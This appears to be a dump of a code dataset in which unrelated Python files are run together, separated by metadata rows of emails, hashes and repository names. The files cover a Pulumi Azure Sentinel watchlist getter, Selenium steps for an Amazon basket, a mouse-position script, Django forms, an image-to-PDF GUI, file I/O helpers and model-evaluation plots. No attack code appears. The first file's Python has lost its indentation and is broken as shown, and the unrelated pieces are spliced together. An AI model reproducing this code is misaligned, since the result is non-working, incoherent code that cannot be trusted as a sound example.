@pulumi.getter(name="defaultDuration")
def default_duration(self) -> Optional[str]:
"""
The default duration of a watchlist (in ISO 8601 duration format)
"""
return pulumi.get(self, "default_duration")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
A description of the watchlist
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> str:
"""
The display name of the watchlist
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def labels(self) -> Optional[Sequence[str]]:
"""
List of labels relevant to this watchlist
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="lastUpdatedTimeUtc")
def last_updated_time_utc(self) -> Optional[str]:
"""
The last time the watchlist was updated
"""
return pulumi.get(self, "last_updated_time_utc")
@property
@pulumi.getter
def name(self) -> str:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def notes(self) -> Optional[str]:
"""
The notes of the watchlist
"""
return pulumi.get(self, "notes")
@property
@pulumi.getter
def provider(self) -> str:
"""
The provider of the watchlist
"""
return pulumi.get(self, "provider")
@property
@pulumi.getter
def source(self) -> str:
"""
The source of the watchlist
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[str]:
"""
The tenantId where the watchlist belongs to.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> str:
"""
Azure resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="updatedBy")
def updated_by(self) -> Optional['outputs.UserInfoResponse']:
"""
Describes a user that updated the watchlist
"""
return pulumi.get(self, "updated_by")
@property
@pulumi.getter(name="watchlistItems")
def watchlist_items(self) -> Optional[Sequence['outputs.WatchlistItemResponse']]:
"""
List of watchlist items.
"""
return pulumi.get(self, "watchlist_items")
@property
@pulumi.getter(name="watchlistType")
def watchlist_type(self) -> Optional[str]:
"""
The type of the watchlist
"""
return pulumi.get(self, "watchlist_type")
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> Optional[str]:
"""
The workspaceId where the watchlist belongs to.
"""
return pulumi.get(self, "workspace_id")
class AwaitableGetWatchlistResult(GetWatchlistResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWatchlistResult(
created_by=self.created_by,
created_time_utc=self.created_time_utc,
default_duration=self.default_duration,
description=self.description,
display_name=self.display_name,
etag=self.etag,
labels=self.labels,
last_updated_time_utc=self.last_updated_time_utc,
name=self.name,
notes=self.notes,
provider=self.provider,
source=self.source,
tenant_id=self.tenant_id,
type=self.type,
updated_by=self.updated_by,
watchlist_items=self.watchlist_items,
watchlist_type=self.watchlist_type,
workspace_id=self.workspace_id)
def get_watchlist(operational_insights_resource_provider: Optional[str] = None,
resource_group_name: Optional[str] = None,
watchlist_alias: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWatchlistResult:
"""
Use this data source to access information about an existing resource.
:param str operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param str resource_group_name: The name of the resource group within the user's subscription. The name is case insensitive.
:param str watchlist_alias: Watchlist Alias
:param str workspace_name: The name of the workspace.
"""
__args__ = dict()
__args__['operationalInsightsResourceProvider'] = operational_insights_resource_provider
__args__['resourceGroupName'] = resource_group_name
__args__['watchlistAlias'] = watchlist_alias
__args__['workspaceName'] = workspace_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:securityinsights/v20190101preview:getWatchlist', __args__, opts=opts, typ=GetWatchlistResult).value
return AwaitableGetWatchlistResult(
created_by=__ret__.created_by,
created_time_utc=__ret__.created_time_utc,
default_duration=__ret__.default_duration,
description=__ret__.description,
display_name=__ret__.display_name,
etag=__ret__.etag,
labels=__ret__.labels,
last_updated_time_utc=__ret__.last_updated_time_utc,
name=__ret__.name,
notes=__ret__.notes,
provider=__ret__.provider,
source=__ret__.source,
tenant_id=__ret__.tenant_id,
type=__ret__.type,
updated_by=__ret__.updated_by,
watchlist_items=__ret__.watchlist_items,
watchlist_type=__ret__.watchlist_type,
workspace_id=__ret__.workspace_id)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
a23f563e1df219a658a0f8c8d16322002848dada | 70765f9e1ba53a8a10fac19b5400da02cc72973e | /features/steps/addItem.py | 134387198429ad304551fc0319e51c7573a63b43 | [] | no_license | ian-m-robinson/BehaveFeature1 | 4c25570586b4d0d707fff3e258b499402f411f83 | ed2d2d2f05e05682648970053e7fad354ac0e534 | refs/heads/master | 2023-03-08T01:11:33.606461 | 2021-02-21T11:48:25 | 2021-02-21T11:48:25 | 340,887,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,484 | py | from behave import *
from selenium import webdriver
from pageObjects.amazonSelection import AmazonHelper
# NOTE(review): module-level side effects — a Chrome session starts and
# Amazon is loaded as soon as behave imports this step module. The
# chromedriver path is machine-specific; consider an env var or config.
driver = webdriver.Chrome(executable_path="C:/WebDrivers/Chrome/88.0.4324.96/chromedriver.exe")
driver.implicitly_wait(10)
driver.maximize_window()
driver.get('https://www.amazon.co.uk/')
##### 1 #####
@given('the users basket has "{count}" items in it')
def getBasketCount(context, count):
    """Precondition: the basket badge already shows exactly *count* items."""
    helper = AmazonHelper(driver)
    observed = helper.getBasketCount()
    # Direct assert is equivalent to the original if/else assert True/False.
    assert observed == count
@when('the user adds the item to the basket')
def addItem2Basket(context):
    # Adds one hard-coded product; the scenario text does not parameterize it.
    amazon = AmazonHelper(driver)
    amazon.addItem2Basket("gordons gin")
@then('the users basket has "{count}" items in it')
def verifyBasketCount(context, count):
    """Postcondition: the basket badge now shows exactly *count* items."""
    helper = AmazonHelper(driver)
    observed = helper.getBasketCount()
    # Direct assert is equivalent to the original if/else assert True/False.
    assert observed == count
##### 2 #####
@given('the users basket has at least "{count}" item')
def checkBasketCount(context, count):
    """Precondition: the basket holds at least *count* items.

    Bug fix: the step text says "at least" but the original tested strict
    equality — and on strings. Compare numerically with ">=".
    NOTE(review): a second step function with this same name is defined
    further down in this module; consider renaming one of them.
    """
    amazon = AmazonHelper(driver)
    # int() handles the string values seen elsewhere in this module
    # (other steps also convert with int()).
    assert int(amazon.getBasketCount()) >= int(count)
@when('the user adds another item to the basket')
def addAnotherItem(context):
    # A different product from step 1 so the basket gains a new line item.
    amazon = AmazonHelper(driver)
    #amazon.addItem2Basket("fever tree tonic")
    amazon.addItem2Basket("Yorkshire Tonic Water Mixed Variety Selection Pack")
@then('the users basket has "{count}" more item in it')
def verifyItemCount(context, count):
    """Postcondition: the basket count grew by exactly one over *count*."""
    helper = AmazonHelper(driver)
    # Same integer comparison as the original, expressed as a single assert.
    assert int(helper.getBasketCount()) == int(count) + 1
##### 3 #####
@given('the users basket has at least "{count}" item in it')
def checkBasketCount(context,count):
    """Precondition: the basket holds at least *count* items.

    Bug fix: both values are strings, so the original ">=" compared
    lexicographically (e.g. "9" >= "10" is True). Compare as integers.
    NOTE(review): this shadows an earlier function of the same name;
    behave still matches both steps via their decorators.
    """
    amazon = AmazonHelper(driver)
    assert int(amazon.getBasketCount()) >= int(count)
@when('the user adds more than "{count}" item to the basket')
def openHomepage(context, count):
    # NOTE(review): misleading name — this step adds items; it does not open
    # the homepage. It adds (count + 2) units of one fixed product so the
    # basket ends up with strictly more than "count" items.
    amazon = AmazonHelper(driver)
    amazon.addMultipleItems2Basket("smirnoff vodka 1ltr", int(count)+2)
@then('the users basket has more than "{count}" item in it')
def verifyLogo(context, count):
    """Postcondition: the basket holds at least *count* items.

    Bug fix: the values appear to be strings (other steps convert with
    int()), so lexicographic ">=" was wrong for counts (e.g. "9" > "10").
    Kept the original ">=" semantics even though the step text says
    "more than" — confirm whether strict ">" is intended.
    NOTE(review): function name says "logo" but the step verifies the
    basket count; behave matches on the decorator text, not the name.
    """
    amazon = AmazonHelper(driver)
    assert int(amazon.getBasketCount()) >= int(count)
@then('teardown browser')
def closeBrowser(context):
    # Closes the current window only; driver.quit() would also end the
    # chromedriver session — confirm which is intended for teardown.
    driver.close()
"ian.robinson@grassvalley.com"
] | ian.robinson@grassvalley.com |
c5ca7cefe08c0d9afc5de1026d5235f3313881e0 | 991c41603a460870f66b8017c7b1e17ca3cef1eb | /MouseLocation32.py | ef9080adc741c5fe775a2c335b56f1fc75c1f6da | [] | no_license | xiangpengBu/angle | 2953ae926fa423b94df0769750b58ac1069c5a49 | cd4cacb8383de687ca8db609e605455905193421 | refs/heads/master | 2022-11-09T18:34:19.537581 | 2020-06-22T08:30:45 | 2020-06-22T08:30:45 | 274,082,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | # -*- coding: utf-8 -*-
"""
作者:小卜
功能:鼠标键盘控制word
版本:v1.0
日期:2019/07/21
"""
import pyautogui
try:
while True:
x, y = pyautogui.position()
print(x, y)
except KeyboardInterrupt:
print('\nExit.') | [
"xiangpeng.bu@gmail.com"
] | xiangpeng.bu@gmail.com |
3f80baeaee8814fce5876d1fd05427e8e5961cfc | 281a10505f8044dbed73f11ed731bd0fbe23e0b5 | /expenseApp/forms.py | a27cb1ba630beb7e285f40eca794838affed173f | [
"Apache-2.0"
] | permissive | cs-fullstack-fall-2018/project3-django-jpark1914 | 7c6f57ab5f8055c11ac5b9d3c8bf0aa5057008d7 | 53bca13243d7e50263ec25b2fb8a299a8bbada1c | refs/heads/master | 2020-04-02T00:59:33.254360 | 2018-10-29T04:58:42 | 2018-10-29T04:58:42 | 153,831,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | from .models import AccountModel, UserSetup, TransactionModel
from django import forms
class AccountForm(forms.ModelForm):
    """Account-creation form; money fields are hidden and filled server-side."""
    class Meta:
        model = AccountModel
        fields = ['account_name','balance','savings','deposit', 'expense']
        # NOTE(review): 'balance' passes the HiddenInput class while the
        # others pass instances — Django accepts both, but be consistent.
        widgets = {'balance': forms.HiddenInput, 'savings':forms.HiddenInput(), 'deposit': forms.HiddenInput(), 'expense': forms.HiddenInput()}
class DepositForm(forms.ModelForm):
    """Form for recording a deposit; the expense field is hidden."""
    class Meta:
        model = AccountModel
        fields = ['deposit','expense']
        widgets = {'expense': forms.HiddenInput()}
class ExpenseForm(forms.ModelForm):
    """Form for recording a single expense against an account."""
    class Meta:
        model = AccountModel
        fields = ['expense']
fields = ['expense']
class UserForm(forms.ModelForm):
class Meta:
model = UserSetup
fields = ['name', 'email', 'password']
widgets = {
'password': forms.PasswordInput(),
}
| [
"parkerj4321@gmail.com"
] | parkerj4321@gmail.com |
2bb25eec64ffb25dc4f7dbffaaeabcdea013bc40 | ec368665385e591759114b8d614ac82a11ecbc4d | /image_to_pdf.py | a36903822a5dff7a47040005c2e9f9de92f3f377 | [] | no_license | driverxxvii/PDF_Tools | 454d4689307b6b9731e70fd12e4590e1a21569a6 | 4ec01519a6e27681225867eddf543cceb96e5073 | refs/heads/master | 2022-12-21T09:40:09.404074 | 2020-10-01T20:57:54 | 2020-10-01T20:57:54 | 268,502,576 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,083 | py | import pathlib
import img2pdf
import PySimpleGUI as sg
import os
import subprocess
from configparser import ConfigParser
def verify_folder_path(folder_path):
    """Return True if *folder_path* refers to an existing directory.

    Accepts either a str or a Path-like object.
    """
    # is_dir() already returns a bool — no need for an if/else ladder.
    return pathlib.Path(folder_path).is_dir()
def get_image_list(source_path):
    """Return the .jpg/.png files directly inside *source_path* as str paths.

    Matching is case-insensitive on the extension; subdirectories are not
    searched. Order follows the directory listing, as before.
    """
    source = pathlib.Path(source_path)
    return [
        str(entry)
        for entry in source.iterdir()
        if entry.is_file() and entry.suffix.lower() in (".jpg", ".png")
    ]
def create_pdf_from_images(img_list, save_path, file_name):
    """Write *img_list* (image file paths) into one PDF in *save_path*.

    Pops up GUI dialogs: aborts when there are no images, and asks before
    overwriting an existing PDF of the same name.
    """
    file_name = f"{file_name}.pdf"
    save_file_name = pathlib.Path(save_path).joinpath(file_name)
    # Check if there are any images in the source folder
    if len(img_list) == 0:
        sg.popup("There are no image files in the source folder")
        return
    # Ask before clobbering an existing PDF with the same name.
    if save_file_name.exists():
        answer = sg.popup_yes_no("pdf file with the same name already exists\n"
                                 "Do you want to overwrite it?")
        if answer == "No":
            return
    # img2pdf embeds the images without re-encoding them.
    with open(save_file_name, "wb") as f:
        f.write(img2pdf.convert(img_list))
    sg.popup_ok(f"{save_file_name.name} created in\n"
                f"{save_path}")
def read_config_info(section, option):
    """Read one option from Image_to_pdf.ini in the current directory.

    On first run (file missing) the ini is created with its default
    contents before the requested option is read.
    """
    config = ConfigParser()
    config_file = pathlib.Path(os.getcwd()).joinpath("Image_to_pdf.ini")
    if not config_file.exists():
        # Seed the settings file with its defaults on first run.
        defaults = {
            "source": "",
            "destination": "",
            "filename": "ImageToPDF",
            "chk_open_folder": "",
            "chk_open_pdf": "",
        }
        config.add_section("settings")
        for key, value in defaults.items():
            config.set("settings", key, value)
        with open(config_file, "w") as handle:
            config.write(handle)
    config.read(config_file)
    return config.get(section, option)
def write_config_info(section, option, value):
    """Persist one option back into Image_to_pdf.ini in the current directory.

    The file (and *section*) must already exist — read_config_info() creates
    it on first use.
    """
    config_file = pathlib.Path(os.getcwd()).joinpath("Image_to_pdf.ini")
    config = ConfigParser()
    config.read(config_file)
    config.set(section, option, value)
    with open(config_file, "w") as handle:
        config.write(handle)
def get_num_of_files(source_path, file_types):
    """Count directory entries in *source_path* whose (lower-cased) extension
    is in *file_types*. Like the original, directories with a matching
    suffix would also be counted.
    """
    folder = pathlib.Path(source_path)
    return sum(1 for entry in folder.iterdir()
               if entry.suffix.lower() in file_types)
def get_total_file_size(source_path, file_types):
    """Total size in MB of entries in *source_path* matching *file_types*.

    Keeps the original tiered precision: 2 decimals under 10 MB,
    1 decimal under 100 MB, whole MB at 100 MB and above.
    """
    folder = pathlib.Path(source_path)
    size_mb = sum(
        entry.stat().st_size
        for entry in folder.iterdir()
        if entry.suffix.lower() in file_types
    ) / 1024 ** 2
    if int(size_mb) < 10:
        return round(size_mb, 2)
    if int(size_mb) < 100:
        return round(size_mb, 1)
    return int(size_mb)
def open_save_folder(folder_path):
    """Open *folder_path* in a maximized Explorer window (Windows only).

    Shells out to ``cmd /c start /max``; any failure is reported via a
    GUI popup rather than raised.
    """
    try:
        folder_path = pathlib.Path(folder_path)
        subprocess.call(["cmd", r"/c", "start", r"/max", folder_path])
    except Exception as ex:
        sg.popup_ok(f"An error occured while trying to open folder\n"
                    f"{folder_path}\n"
                    f"Error - {ex}")
def open_pdf_file(file_path, file_name):
    """Open ``file_path/file_name.pdf`` with the OS-default PDF viewer.

    Uses shell=True so the Windows file association resolves the viewer.
    """
    file_name = f"{file_name}.pdf"
    file_path = pathlib.Path(file_path)
    file_path = file_path.joinpath(file_name)
    subprocess.Popen([file_path], shell=True)
def gui_layout():
    """Build and return the finalized PySimpleGUI main window.

    Initial field values and checkbox states are restored from
    Image_to_pdf.ini via read_config_info().
    """
    source_path = read_config_info("settings", "source")
    save_path = read_config_info("settings", "destination")
    file_name = read_config_info("settings", "filename")
    # The ini stores "1" for checked and "" for unchecked; bool("") is False.
    chk_open_folder = bool(read_config_info("settings", "chk_open_folder"))
    chk_open_pdf = bool(read_config_info("settings", "chk_open_pdf"))
    sg.theme("Light Green")
    images_frame = [
        # NOTE(review): stray f-prefix on a literal with no placeholders.
        [sg.Text(f"Select the source folder where images are located")],
        [sg.Input(source_path, disabled=False, enable_events=True, key="source_path"),
         sg.FolderBrowse()],
        [sg.Text("", size=(47, 1), key="num_of_images")]
    ]
    pdf_frame = [
        [sg.Text("Select the folder to save the PDF file in")],
        [sg.Input(save_path, disabled=False, key="save_path"),
         sg.FolderBrowse()],
        [sg.Text("Save as filename"),
         sg.Input(file_name, key="save_file_name", size=(38, 1))],
        [sg.Text("", size=(47, 1), key="pdf_size_label")],
    ]
    layout = [
        [sg.Frame("Images", images_frame)],
        [sg.Frame("PDF File", pdf_frame)],
        [sg.Checkbox("Open folder after pdf is created", key="chk_open_folder",
                     enable_events=True, default=chk_open_folder)],
        [sg.Checkbox("Open PDF file after creating it", key="chk_open_pdf",
                     enable_events=True, default=chk_open_pdf)],
        [sg.Button("Create PDF", key="Create PDF", size=(10, 1)),
         sg.Button("Exit", size=(10, 1))],
        # [sg.Button("Test", key="Test")]
    ]
    return sg.Window("Images to PDF", layout, finalize=True)
def event_loop():
    """Run the main GUI loop: persist settings, preview counts, create PDFs.

    Blocks until the window is closed or "Exit" is pressed.
    """
    window = gui_layout()
    while True:
        event, values = window.read()
        # Window closed (None) or Exit button pressed.
        if event in (None, "Exit"):
            window.close()
            break
        # Persist checkbox state: "1" = checked, "" = unchecked.
        if event == "chk_open_folder":
            if values["chk_open_folder"]:
                write_config_info("settings", "chk_open_folder", "1")
            else:
                # bool("") evaluates to False
                write_config_info("settings", "chk_open_folder", "")
        if event == "chk_open_pdf":
            if values["chk_open_pdf"]:
                write_config_info("settings", "chk_open_pdf", "1")
            else:
                write_config_info("settings", "chk_open_pdf", "")
        # Live preview: show image count and estimated PDF size for the folder.
        if event == "source_path":
            source_path = values["source_path"]
            if verify_folder_path(source_path):
                file_types = [".jpg", ".png"]
                num_files = get_num_of_files(source_path, file_types)
                total_size = get_total_file_size(source_path, file_types)
                message = f"There are {num_files} images in the selected folder"
                pdf_size_message = f"Estimated file size of PDF: {total_size} MB"
                window["num_of_images"].update(message)
                window["pdf_size_label"].update(pdf_size_message)
        if event == "Create PDF":
            source_path = values["source_path"]  # read values from input boxes
            save_path = values["save_path"]
            save_file_name = values["save_file_name"]
            # Validate both folders before writing anything.
            if source_path == "" or save_path == "":
                sg.popup("Please select a source and destination folder")
            elif not verify_folder_path(source_path):
                sg.popup("The source folder specified is invalid\n"
                         "Please select a valid folder")
            elif not verify_folder_path(save_path):
                sg.popup("The save folder specified is invalid\n"
                         "Please select a valid folder")
            else:
                # Remember the successful choices for the next run.
                write_config_info("settings", "source", source_path)
                write_config_info("settings", "destination", save_path)
                write_config_info("settings", "filename", save_file_name)
                image_list = get_image_list(source_path)
                create_pdf_from_images(image_list, save_path, save_file_name)
                if values["chk_open_folder"]:
                    open_save_folder(save_path)
                if values["chk_open_pdf"]:
                    open_pdf_file(save_path, save_file_name)
def main():
    """Program entry point: run the GUI event loop until the user exits."""
    event_loop()
if __name__ == '__main__':
main()
# todo
# fixme
# large image files cause crash. Use PIL thumbnail to reduce size
| [
"noreply@github.com"
] | driverxxvii.noreply@github.com |
5443d92465ce82b11372495fff29617c70497999 | eba78a0880b0c1e11b86ec43d36ae4aaf211fe93 | /models/vision/detection/awsdet/utils/fileio/io.py | 39596c9b35df4ec2518ca9625d78690c61c0815c | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | sagardotme/deep-learning-models | 54a9a2d5885d1678e7b3e9caa234b5d597808c15 | c4ebbdacf10af45a29dc1f5ad40df4c90d978184 | refs/heads/master | 2022-11-13T06:23:41.615005 | 2020-06-22T22:07:00 | 2020-06-22T22:07:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,793 | py | # Copyright (c) Open-MMLab. All rights reserved.
from pathlib import Path
from awsdet.utils.generic import is_list_of, is_str
from .handlers import BaseFileHandler, JsonHandler, PickleHandler, YamlHandler
# Registry mapping a format name / file extension to its handler instance.
# yaml/yml and pickle/pkl deliberately share one handler each.
file_handlers = {
    'json': JsonHandler(),
    'yaml': YamlHandler(),
    'yml': YamlHandler(),
    'pickle': PickleHandler(),
    'pkl': PickleHandler()
}
def load(file, file_format=None, **kwargs):
    """Load data from json/yaml/pickle files.
    This method provides a unified api for loading data from serialized files.
    Args:
        file (str or :obj:`Path` or file-like object): Filename or a file-like
            object.
        file_format (str, optional): If not specified, the file format will be
            inferred from the file extension, otherwise use the specified one.
            Currently supported formats include "json", "yaml/yml" and
            "pickle/pkl".
    Returns:
        The content from the file.
    Raises:
        TypeError: If the format is unsupported, or *file* is neither a
            path string nor a readable file-like object.
    """
    # Normalize Path objects to str so the suffix-based inference and the
    # is_str() branches below behave the same for both input kinds.
    if isinstance(file, Path):
        file = str(file)
    if file_format is None and is_str(file):
        file_format = file.split('.')[-1]
    if file_format not in file_handlers:
        raise TypeError('Unsupported format: {}'.format(file_format))
    handler = file_handlers[file_format]
    if is_str(file):
        obj = handler.load_from_path(file, **kwargs)
    elif hasattr(file, 'read'):
        # Duck-typed file object: anything with a read() method.
        obj = handler.load_from_fileobj(file, **kwargs)
    else:
        raise TypeError('"file" must be a filepath str or a file-object')
    return obj
def dump(obj, file=None, file_format=None, **kwargs):
    """Dump data to json/yaml/pickle strings or files.
    This method provides a unified api for dumping data as strings or to files,
    and also supports custom arguments for each file format.
    Args:
        obj (any): The python object to be dumped.
        file (str or :obj:`Path` or file-like object, optional): If not
            specified, then the object is dump to a str, otherwise to a file
            specified by the filename or file-like object.
        file_format (str, optional): Same as :func:`load`.
    Returns:
        bool: True for success, False otherwise.
    Raises:
        ValueError: If both *file* and *file_format* are None.
        TypeError: If the format is unsupported, or *file* is neither a
            path string nor a writable file-like object.
    """
    if isinstance(file, Path):
        file = str(file)
    if file_format is None:
        if is_str(file):
            file_format = file.split('.')[-1]
        elif file is None:
            # Dumping to a string requires an explicit format.
            raise ValueError(
                'file_format must be specified since file is None')
    if file_format not in file_handlers:
        raise TypeError('Unsupported format: {}'.format(file_format))
    handler = file_handlers[file_format]
    if file is None:
        # No target given: return the serialized string instead of writing.
        return handler.dump_to_str(obj, **kwargs)
    elif is_str(file):
        handler.dump_to_path(obj, file, **kwargs)
    elif hasattr(file, 'write'):
        # Duck-typed file object: anything with a write() method.
        handler.dump_to_fileobj(obj, file, **kwargs)
    else:
        raise TypeError('"file" must be a filename str or a file-object')
def _register_handler(handler, file_formats):
    """Register a handler for some file extensions.
    Args:
        handler (:obj:`BaseFileHandler`): Handler to be registered.
        file_formats (str or list[str]): File formats to be handled by this
            handler.
    Raises:
        TypeError: If *handler* is not a BaseFileHandler, or *file_formats*
            is neither a str nor a list of str.
    """
    if not isinstance(handler, BaseFileHandler):
        raise TypeError(
            'handler must be a child of BaseFileHandler, not {}'.format(
                type(handler)))
    # Accept a single extension as shorthand for a one-element list.
    if isinstance(file_formats, str):
        file_formats = [file_formats]
    if not is_list_of(file_formats, str):
        raise TypeError('file_formats must be a str or a list of str')
    # Later registrations for the same extension overwrite earlier ones.
    for ext in file_formats:
        file_handlers[ext] = handler
def register_handler(file_formats, **kwargs):
    """Class decorator that registers the decorated handler for *file_formats*.

    ``**kwargs`` are forwarded to the handler class's constructor.
    """
    def wrap(cls):
        _register_handler(cls(**kwargs), file_formats)
        return cls
    return wrap
| [
"noreply@github.com"
] | sagardotme.noreply@github.com |
52280d14135fcbe038e6ab859cab81194f5ca7cd | 941eaf75c919c1eaee0415d397b1522d30526e9d | /ML/cluster_graph.py | 8b98f33907c0ed008dbbf89488d0d8c13ecac9d5 | [] | no_license | ldorellana/knowledge | 6ec56c2936ff9d244240a4b15e66e6f037e3f573 | 1f85eceef5855db30819161f7b5087fe0c54c4cc | refs/heads/main | 2023-08-22T07:11:18.448761 | 2021-10-26T23:06:57 | 2021-10-26T23:06:57 | 414,879,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,234 | py | # Databricks notebook source
import plotly.io as pio
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import plotly.figure_factory as ff
from plotly.subplots import make_subplots
import matplotlib.pyplot as plt
import seaborn as sns
import datetime as dt
import numpy as np
# COMMAND ----------
def set_renderer(render: str='jupyterlab', height: int=950, width: int=500):
    """Configure the default Plotly renderer and its figure dimensions.

    NOTE(review): default height (950) > width (500) looks swapped relative
    to typical landscape figures — confirm intent.
    """
    newrender = pio.renderers[render]
    newrender.width = width
    newrender.height = height
    pio.renderers.default = render
# COMMAND ----------
def graph_cluster_features(df: pd.DataFrame, clusters: str='cluster', title: str='CLUSTERS FEATURES COMPARISON',
                           rows: int=2, cols: int=2, height: int=800, width: int=800, horizontal_spacing: float=0.05,
                           renderer: str='jupyterlab', font: int=14, vertical_spacing: float=0.1):
    """
    Draw one box plot per feature (grouped by cluster) in a subplot grid.

    df: pandas DataFrame with the data (one column named *clusters*)
    clusters: name of the column containing the cluster labels
    title: title to show for the whole plot
    rows: number of rows to divide the subplots
    cols: number of columns to divide the subplots

    NOTE(review): height, width and renderer are currently unused — the
    corresponding calls are commented out below and the figure height is
    fixed at rows*400. Hover labels are in Japanese (store / group / rate).
    """
    #set_renderer(renderer, height, width)
    fig = make_subplots(rows=rows, cols=cols, subplot_titles=df.columns,
                        horizontal_spacing = horizontal_spacing, vertical_spacing = vertical_spacing)
    # Current subplot position; advanced column-first, wrapping to a new row.
    col = 0
    row = 1
    # One box trace per feature column.
    for feature in df.columns:
        # Skip the cluster-label column itself.
        if feature != clusters:
            # Advance to the next free subplot cell.
            if col < (cols):
                col+= 1
            else:
                # Wrap to the next row.
                row+=1
                col=1
            # One box per cluster, with every point shown and a custom hover.
            fig.add_trace( go.Box(y=df[feature],
                                 x=df[clusters],
                                 name='',
                                 boxpoints='all',
                                 text=df.index,
                                 customdata=df,
                                 hovertemplate=(
                                     '<b>店舗: %{text}</b><br>'
                                     'グループ: %{x}<br>'
                                     '訪問率: %{y}%<br>'
                                     '<extra></extra>'
                                 )
                                ),
                          row=row,col=col, )
    # Global styling: shared title, palette, and font size.
    fig.update_layout(title_text=title ,showlegend=False,
                      colorway=px.colors.qualitative.T10, font={'size':font})
    fig.update_layout(height=rows*400)
    #fig.update_layout(height=height, width=width)
    fig.update_xaxes(tickfont=dict(size=12),
                     categoryorder='category ascending',
                     title=dict(font=dict(size=14), text='グループ'),
                    )
    return fig
| [
"noreply@github.com"
] | ldorellana.noreply@github.com |
bc765d8f3a13002b4df36a34818d22469358b901 | 08ce9d9c003a97832d0b754c36e448340052d8c0 | /mili_moudle/lib/model_evaluation_plot.py | 13a0d38c0199b857cbc05f84d09543c7c8de46dd | [] | no_license | reference-project/my_work | fb6660d95cdf51210591448d82d5d4fdc29a55e8 | d6fa1ab7f510ac10d814b10d0ed2aeffccb3f53b | refs/heads/master | 2020-05-15T09:20:27.975953 | 2017-11-16T02:08:53 | 2017-11-16T02:08:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,698 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 27 17:15:55 2017
@author: potato
用于绘制模型效果的图的工具
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve,auc
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score,precision_score,recall_score
from scipy import stats
def __tool_sas_rank1(tmp_frame,group):
'''
这个按照 sas 公式实现rank分组功能,公式为
floor(rank*k/(n+1))
'''
lenth = len(tmp_frame)
tmp_frame['rank'] = tmp_frame.ix[:,1].rank(method='min')
tmp_frame['group_num'] = tmp_frame.apply(lambda row : np.floor(row['rank']*group/(lenth+1)), axis=1)
def Model_Evaluation_Plot(model,X,y,plot="all",ksgroup=20):
#plot接受参数如下面字典
graph_show = {"cm":False,"roc":False,"ks":False}
if plot == "all":
for k,v in graph_show.items():
graph_show[k] = True
else:
graph_show[plot] = True #将指定的图设置为展示
#plot Confusion Matrix 混淆矩阵
if graph_show["cm"]:
y_pred = model.predict(X)
cm = confusion_matrix(y,y_pred)
plt.matshow(cm)
plt.title('Confusion matrix')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
print("accuracy_score %s"%(str(accuracy_score(y,y_pred))))
print("precision_score %s"%(str(precision_score(y,y_pred))))
print("recall_score %s"%(str(recall_score(y,y_pred))))
#==============================================================================
# """
# 当预测效果较好时,ROC曲线凸向左上角的顶点。
# 平移图中对角线,与ROC曲线相切,可以得到TPR较大而FPR较小的点。
# 模型效果越好,则ROC曲线越远离对角线,极端的情形是ROC曲线经过(0,1)点,即将正例全部预测为正例而将负例全部预测为负例。
# ROC曲线下的面积可以定量地评价模型的效果,记作AUC,AUC越大则模型效果越好。
# """
#==============================================================================
#plot ROC curve
if graph_show["roc"]:
predictions_prob_forest = model.predict_proba(X)
false_positive_rate,recall,threshold = roc_curve(y,predictions_prob_forest[:,1])
roc_auc = auc(false_positive_rate,recall)
plt.title('ROC curve')
plt.ylabel('True Positive rate')
plt.xlabel('False Positive rate')
print("ROC_AUC is %s"%roc_auc)
plt.plot(false_positive_rate,recall)
plt.plot([0, 1], [0, 1], 'r--')
plt.show()
#plot KS
if graph_show["ks"]:
predictions_prob = pd.DataFrame(model.predict_proba(X))
predictions_prob['y'] = y.get_values()
__tool_sas_rank1(predictions_prob,ksgroup)
closPred1 = predictions_prob.groupby('group_num')[1].agg({'minPred1':min,'maxPred1':max})
colsy = predictions_prob.groupby('group_num')['y'].agg({'bad':sum,'N':len})
colsy['good'] = colsy['N']-colsy['bad']
colscumy = colsy.cumsum(0)
colscumy = colscumy.rename(columns={'bad':'cum1','N': 'cumN','good':'cum0'})
colscumy['cum1Percent'] = colscumy['cum1']/colscumy['cum1'].max()
colscumy['cum0Percent'] = colscumy['cum0']/colscumy['cum0'].max()
colscumy['cumDiff'] = abs(colscumy['cum1Percent']-colscumy['cum0Percent'])
ks_file = pd.concat([closPred1,colsy,colscumy],axis=1)
ks_file['group'] = ks_file.index
x = np.arange(1,ks_file.shape[0]+1)
plt.plot(x,ks_file['cum0Percent'], label='cum0Percent',marker='o')
plt.plot(x,ks_file['cum1Percent'], label='cum1Percent',marker='o')
